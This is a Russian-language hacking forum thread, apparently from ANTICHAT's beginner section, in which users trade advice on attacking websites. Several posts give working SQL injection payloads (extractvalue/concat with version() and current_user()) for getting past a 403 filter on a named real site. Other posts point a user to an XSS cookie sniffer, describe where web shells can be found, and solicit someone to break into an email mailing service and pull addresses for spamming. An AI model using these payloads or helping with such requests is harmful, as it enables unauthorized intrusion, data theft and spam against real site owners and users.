HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.05.2015, 22:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от tiger_x  

Может глупый вопрос. А где сниффер взять?
вот, например:

http://www.truehackers.ru/articles/p...sniffer-na-php

да любой из гугла можно взять по "xss sniffer"
 
Ответить с цитированием

  #12  
Старый 10.05.2015, 22:06
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от BabaDook  

http://mr.lumbolka.ru/ru/index.php?id=-100+union+select
+user()+--+ -
403 Forbidden

Подскажите пожалуйста как сделать что бы запрос прошёл. Кодировал url кодировкой , делал бувер оферфлов но всё равно не проходит.

Код:
http://mr.lumbolka.ru/ru/index.php?id=100+and+extractvalue(1,coNCat(0x3a,version()))
так же пройдет UnIoN, только я вывод не нашел.
 
Ответить с цитированием

  #13  
Старый 10.05.2015, 22:07
tiger_x
Новичок
Регистрация: 09.05.2015
Сообщений: 27
С нами: 5797046

Репутация: 7
По умолчанию

Цитата:
Сообщение от faza02  

вот, например:
http://www.truehackers.ru/articles/p...sniffer-na-php
да любой из гугла можно взять по "xss sniffer"
спасибо
 
Ответить с цитированием

  #14  
Старый 10.05.2015, 22:12
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от faza02  

Код:
http://mr.lumbolka.ru/ru/index.php?id=100+and+extractvalue(1,coNCat(0x3a,version()))
так же пройдет UnIoN, только я вывод не нашел.
Спасибо, такое наверное прокатит, там кодировка сбита, трудно будет искать вывод в исходнике.

Всё спасибо . Смотри

Код:
http://mr.lumbolka.ru/ru/index.php?id=100+and+false+and+extractvalue%281,coNCat%280x3a,version%28%29%29%29+--+%20-
 
Ответить с цитированием

  #15  
Старый 11.05.2015, 01:58
Mister_Bert0ni
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами: 5795606

Репутация: 57
По умолчанию

Цитата:
Сообщение от Arboretum  

Наверное многим тут есть что спросить... Спрашиваем тут, знатоки заходят и отвечают. Мой вопрос, существуют ли html шеллы?
Увы HTML это не серверный язык а всего лишь язик гипертекстовой разметки...Так сказать визуализация страницы...SHELL-ы есть под те языки на которых работают WEB-сервера.На сегодняшний день мне известны asp aspx cfm jsp perl php - шеллы...Для примера можно заглянуть в /usr/share/webshells если пользуешся Kali Linux..
 
Ответить с цитированием

  #16  
Старый 11.05.2015, 02:09
Mister_Bert0ni
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами: 5795606

Репутация: 57
По умолчанию

Цитата:
Сообщение от BabaDook  

http://mr.lumbolka.ru/ru/index.php?id=-100+union+select
+user()+--+ -
403 Forbidden

Подскажите пожалуйста как сделать что бы запрос прошёл. Кодировал url кодировкой , делал бувер оферфлов но всё равно не проходит.

http://mr.lumbolka.ru/ru/index.php?i...rrent_user()))
 
Ответить с цитированием

  #17  
Старый 11.05.2015, 02:23
vBr
Новичок
Регистрация: 10.05.2015
Сообщений: 25
С нами: 5795606

Репутация: 0
По умолчанию

Вопрос,

Можно ли взломать сайт -и сдампить Полностью Шаблон, и движек?
 
Ответить с цитированием

  #18  
Старый 11.05.2015, 02:38
Cthulchu
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
С нами: 9720289

Репутация: 1549


По умолчанию

Цитата:
Сообщение от vBr  

Вопрос,
Можно ли взломать сайт -и сдампить Полностью Шаблон, и движек?
если в процессе взлома вам какм-либо удалось получить доступ к файловой системе, то да, вы имеете такую возможность.

Ваш К.О.
 
Ответить с цитированием

  #19  
Старый 11.05.2015, 16:04
vBr
Новичок
Регистрация: 10.05.2015
Сообщений: 25
С нами: 5795606

Репутация: 0
По умолчанию

Вопрос,

Раньше FireFox в гугле вобью что нибудь и бегаю по ссылка нажимал левой кнопкой мыши -влкдака открывалась отдельно, сейчас переходит сразу же по ссылки т.е не открывается отдельно, в настройках в Мозиле в разделе Влкдаки все проверил не че не нашел, не обновлял не менял фф, как это исправить? хочу как раньше что бы открывалась сразу новая вкладка,
 
Ответить с цитированием

  #20  
Старый 11.05.2015, 16:07
Johnydriver
Новичок
Регистрация: 09.05.2015
Сообщений: 18
С нами: 5797046

Репутация: 0
По умолчанию

Есть кто-то к кому можно обратиться чтобы взломал джаст или смарт сервис рассылок и достал оттуда свежые емейл адреса? (не для продажи, а для личного использования - спама)

Если да, подскажите к кому?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.